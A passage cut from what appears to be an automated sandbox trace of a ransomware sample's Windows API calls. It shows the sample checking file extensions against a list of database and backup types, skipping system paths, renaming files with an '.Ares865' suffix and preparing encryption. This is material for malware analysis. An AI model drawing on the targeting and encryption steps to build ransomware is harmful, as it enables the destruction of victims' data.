lpString2="lwx") returned -1 [0086.237] lstrlenW (lpString="maf") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.237] lstrlenW (lpString="maq") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.237] lstrlenW (lpString="mar") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.237] lstrlenW (lpString="marshal") returned 7 [0086.237] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.237] lstrlenW (lpString="mas") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.237] lstrlenW (lpString="mav") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.237] lstrlenW (lpString="maw") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.237] lstrlenW (lpString="mdbhtml") returned 7 [0086.237] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.237] lstrlenW (lpString="mdn") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.237] lstrlenW (lpString="mdt") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.237] lstrlenW (lpString="mfd") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.237] lstrlenW (lpString="mpd") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.237] lstrlenW (lpString="mrg") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.237] lstrlenW (lpString="mud") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.237] lstrlenW (lpString="mwb") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.238] lstrlenW (lpString="myd") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.238] lstrlenW (lpString="ndf") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.238] lstrlenW (lpString="nnt") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.238] lstrlenW (lpString="nrmlib") returned 6 [0086.238] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.238] lstrlenW (lpString="ns2") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.238] lstrlenW (lpString="ns3") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.238] lstrlenW (lpString="ns4") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.238] lstrlenW (lpString="nsf") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.238] lstrlenW (lpString="nv") returned 2 [0086.238] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.238] lstrlenW (lpString="nv2") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.238] lstrlenW (lpString="nwdb") returned 4 [0086.238] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.238] lstrlenW (lpString="nyf") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.238] lstrlenW (lpString="odb") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.238] lstrlenW (lpString="odb") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.238] lstrlenW (lpString="oqy") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.238] lstrlenW (lpString="ora") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.238] lstrlenW (lpString="orx") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.238] lstrlenW (lpString="owc") returned 3 [0086.238] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.238] lstrlenW (lpString="p96") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.239] lstrlenW (lpString="p97") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.239] lstrlenW (lpString="pan") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.239] lstrlenW (lpString="pdb") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.239] lstrlenW (lpString="pdm") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.239] lstrlenW (lpString="pnz") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.239] lstrlenW (lpString="qry") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.239] lstrlenW (lpString="qvd") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.239] lstrlenW (lpString="rbf") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.239] lstrlenW (lpString="rctd") returned 4 [0086.239] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.239] lstrlenW (lpString="rod") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.239] lstrlenW (lpString="rodx") returned 4 [0086.239] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.239] lstrlenW (lpString="rpd") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.239] lstrlenW (lpString="rsd") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.239] lstrlenW (lpString="sas7bdat") returned 8 [0086.239] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.239] lstrlenW (lpString="sbf") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.239] lstrlenW (lpString="scx") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.239] lstrlenW (lpString="sdb") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.239] lstrlenW (lpString="sdc") returned 3 [0086.239] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.239] lstrlenW (lpString="sdf") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.240] lstrlenW (lpString="sis") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.240] lstrlenW (lpString="spq") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.240] lstrlenW (lpString="te") returned 2 [0086.240] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.240] lstrlenW (lpString="teacher") returned 7 [0086.240] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.240] lstrlenW (lpString="tmd") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.240] lstrlenW (lpString="tps") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.240] lstrlenW (lpString="trc") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.240] lstrlenW (lpString="trc") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.240] lstrlenW (lpString="trm") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.240] lstrlenW (lpString="udb") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.240] lstrlenW (lpString="udl") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.240] lstrlenW (lpString="usr") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.240] lstrlenW (lpString="v12") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.240] lstrlenW (lpString="vis") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.240] lstrlenW (lpString="vpd") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.240] lstrlenW (lpString="vvv") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.240] lstrlenW (lpString="wdb") returned 3 [0086.240] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.240] lstrlenW (lpString="wmdb") returned 4 [0086.240] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.240] lstrlenW (lpString="wrk") returned 3 [0086.241] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.241] lstrlenW (lpString="xdb") returned 3 [0086.241] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.241] lstrlenW (lpString="xld") returned 3 [0086.241] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.241] lstrlenW (lpString="xmlff") returned 5 [0086.241] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.241] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.Ares865") returned 79 [0086.241] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.251] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.251] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45920) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.252] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.253] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.253] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.253] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb660, lpName=0x0) returned 0x15c [0086.255] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb660) returned 0x190000 [0086.258] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.259] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.259] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.259] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.260] CloseHandle (hObject=0x15c) returned 1 [0086.260] CloseHandle (hObject=0x118) returned 1 [0086.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.260] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63b88300, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63b88300, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0086.260] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.260] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.260] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".") returned 1 [0086.260] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="..") returned 1 [0086.260] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="windows") returned -1 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="temp") returned -1 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="boot") returned 1 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="perflogs") returned -1 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.261] lstrlenW (lpString="ONINTL.DLL.trx_dll") returned 18 [0086.261] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 [0086.261] lstrcpyW (in: lpString1=0x2cce468, lpString2="ONINTL.DLL.trx_dll" | out: lpString1="ONINTL.DLL.trx_dll") returned="ONINTL.DLL.trx_dll" [0086.261] lstrlenW (lpString="ONINTL.DLL.trx_dll") returned 18 [0086.261] lstrlenW (lpString="Ares865") returned 7 [0086.261] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.261] lstrlenW (lpString=".dll") returned 4 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0086.261] lstrlenW (lpString=".lnk") returned 4 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.261] lstrlenW (lpString=".ini") returned 4 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0086.261] lstrlenW (lpString=".sys") returned 4 [0086.261] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0086.261] lstrlenW (lpString="ONINTL.DLL.trx_dll") returned 18 [0086.261] lstrlenW (lpString="bak") returned 3 [0086.261] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.261] lstrlenW (lpString="ba_") returned 3 [0086.261] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.261] lstrlenW (lpString="dbb") returned 3 [0086.261] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.261] lstrlenW (lpString="vmdk") returned 4 [0086.261] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.261] lstrlenW (lpString="rar") returned 3 [0086.261] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.261] lstrlenW (lpString="zip") returned 3 [0086.261] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.261] lstrlenW (lpString="tgz") returned 3 [0086.261] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.262] lstrlenW (lpString="vbox") returned 4 [0086.262] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.262] lstrlenW (lpString="vdi") returned 3 [0086.262] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.262] lstrlenW (lpString="vhd") returned 3 [0086.262] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.262] lstrlenW (lpString="vhdx") returned 4 [0086.262] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.262] lstrlenW (lpString="avhd") returned 4 [0086.262] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.262] lstrlenW (lpString="db") returned 2 [0086.262] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.262] lstrlenW (lpString="db2") returned 3 [0086.262] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.262] lstrlenW (lpString="db3") returned 3 [0086.262] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.262] lstrlenW (lpString="dbf") returned 3 [0086.262] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.262] lstrlenW (lpString="mdf") returned 3 [0086.262] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.262] lstrlenW (lpString="mdb") returned 3 [0086.262] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.262] lstrlenW (lpString="sql") returned 3 [0086.262] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.262] lstrlenW (lpString="sqlite") returned 6 [0086.262] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.262] lstrlenW (lpString="sqlite3") returned 7 [0086.262] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.262] lstrlenW (lpString="sqlitedb") returned 8 [0086.262] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.262] lstrlenW (lpString="xml") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.263] lstrlenW (lpString="$er") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.263] lstrlenW (lpString="4dd") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.263] lstrlenW (lpString="4dl") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.263] lstrlenW (lpString="^^^") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.263] lstrlenW (lpString="abs") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.263] lstrlenW (lpString="abx") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.263] lstrlenW (lpString="accdb") returned 5 [0086.263] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.263] lstrlenW (lpString="accdc") returned 5 [0086.263] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.263] lstrlenW (lpString="accde") returned 5 [0086.263] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.263] lstrlenW (lpString="accdr") returned 5 [0086.263] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.263] lstrlenW (lpString="accdt") returned 5 [0086.263] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.263] lstrlenW (lpString="accdw") returned 5 [0086.263] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.263] lstrlenW (lpString="accft") returned 5 [0086.263] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.263] lstrlenW (lpString="adb") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.263] lstrlenW (lpString="adb") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.263] lstrlenW (lpString="ade") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.263] lstrlenW (lpString="adf") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.263] lstrlenW (lpString="adn") returned 3 [0086.263] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.264] lstrlenW (lpString="adp") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.264] lstrlenW (lpString="alf") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.264] lstrlenW (lpString="ask") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.264] lstrlenW (lpString="btr") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.264] lstrlenW (lpString="cat") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.264] lstrlenW (lpString="cdb") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.264] lstrlenW (lpString="ckp") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.264] lstrlenW (lpString="cma") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.264] lstrlenW (lpString="cpd") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.264] lstrlenW (lpString="dacpac") returned 6 [0086.264] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.264] lstrlenW (lpString="dad") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.264] lstrlenW (lpString="dadiagrams") returned 10 [0086.264] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.264] lstrlenW (lpString="daschema") returned 8 [0086.264] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.264] lstrlenW (lpString="db-journal") returned 10 [0086.264] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.264] lstrlenW (lpString="db-shm") returned 6 [0086.264] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.264] lstrlenW (lpString="db-wal") returned 6 [0086.264] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.264] lstrlenW (lpString="dbc") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.264] lstrlenW (lpString="dbs") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.264] lstrlenW (lpString="dbt") returned 3 [0086.264] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.265] lstrlenW (lpString="dbv") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.265] lstrlenW (lpString="dbx") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.265] lstrlenW (lpString="dcb") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.265] lstrlenW (lpString="dct") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.265] lstrlenW (lpString="dcx") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.265] lstrlenW (lpString="ddl") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.265] lstrlenW (lpString="dlis") returned 4 [0086.265] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.265] lstrlenW (lpString="dp1") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.265] lstrlenW (lpString="dqy") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.265] lstrlenW (lpString="dsk") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.265] lstrlenW (lpString="dsn") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.265] lstrlenW (lpString="dtsx") returned 4 [0086.265] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.265] lstrlenW (lpString="dxl") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.265] lstrlenW (lpString="eco") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.265] lstrlenW (lpString="ecx") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.265] lstrlenW (lpString="edb") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.265] lstrlenW (lpString="epim") returned 4 [0086.265] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.265] lstrlenW (lpString="fcd") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.265] lstrlenW (lpString="fdb") returned 3 [0086.265] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.266] lstrlenW (lpString="fic") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.266] lstrlenW (lpString="flexolibrary") returned 12 [0086.266] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.266] lstrlenW (lpString="fm5") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.266] lstrlenW (lpString="fmp") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.266] lstrlenW (lpString="fmp12") returned 5 [0086.266] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.266] lstrlenW (lpString="fmpsl") returned 5 [0086.266] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.266] lstrlenW (lpString="fol") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.266] lstrlenW (lpString="fp3") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.266] lstrlenW (lpString="fp4") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.266] lstrlenW (lpString="fp5") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.266] lstrlenW (lpString="fp7") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.266] lstrlenW (lpString="fpt") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.266] lstrlenW (lpString="frm") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.266] lstrlenW (lpString="gdb") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.266] lstrlenW (lpString="gdb") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.266] lstrlenW (lpString="grdb") returned 4 [0086.266] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.266] lstrlenW (lpString="gwi") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.266] lstrlenW (lpString="hdb") returned 3 [0086.266] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.266] lstrlenW (lpString="his") returned 3 [0086.266] lstrcmpiW 